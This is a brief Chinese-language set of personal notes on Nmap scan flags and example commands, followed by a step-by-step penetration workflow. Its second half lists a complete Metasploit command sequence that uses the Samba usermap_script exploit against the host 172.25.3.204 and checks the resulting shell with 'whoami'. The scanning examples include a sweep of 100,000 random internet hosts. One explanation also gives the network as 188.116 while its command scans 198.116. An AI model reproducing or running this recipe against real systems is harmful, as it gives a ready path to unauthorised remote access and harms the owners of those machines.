Nmap
官网资料
这里介绍了NMAP的指令
http://nmap.org/man/zh/
常用指令
操作系统的检测 -A(常用) -O
检测主机 -sP
(Ping扫描)
端口扫描 -sS
(TCP SYN扫描) -sU
(效率较低,UDP扫描) -sT
(当无ROOT权限时候使用,TCP connect()扫描)
指定端口 -p 端口
服务版本扫描 -sV
(版本探测)
输出 -oN <filespec>
(标准输出) -oX <filespec>
(XML输出)
实例
nmap -sV -sS -sU -p 22,53,110,143,4564 198.116.0-255.1-127
进行主机列举和TCP扫描,对象为B类188.116网段中255个8位子网。这 个测试用于确定系统是否运行了sshd、DNS、imapd或4564端口。如果这些端口 打开,将使用版本检测来确定哪种应用在运行。并且使用TCP和UDP
nmap -
sP
-O scanme.nmap.org/24
用PING的方式扫描域名所在网段的所有主机
nmap -v -iR 100000 -P0 -p 80
随机选择100000台主机扫描是否运行Web服务器(80端口)。由起始阶段 发送探测报文来确定主机是否工作非常浪费时间,而且只需探测主机的一个端口,因 此使用-P0
禁止对主机列表。
nmap -sV -sS -oN nmap_abc 172.25.3.204
扫描的结果保存到nmap_abc文件,默认再home目录
nmap -sV -sS -oX nmap_abc 172.25.3.204
扫描的结果保存到nmap_abc文件,默认再home目录(XML格式) 推荐
-----------------------------------------------------------------
step 1 explore
tool: nmap,w3af,sqlmap,openvas...
nmap -sV -n 172.25.3.204
nmap -sV -p 139 -n 172.25.3.204
step2 search attack code,
tool:www.exploit-db.com
www.aol.com
www.baidu.com
http://www.exploit-db.com/exploits/16320/
step3 try it
tool:metaspolit,sqlmap
search usermap_script
use exploit/multi/samba/usermap_script
show payloads
show options
set rhost 172.25.3.204
exploit
---done-----
whoami
------------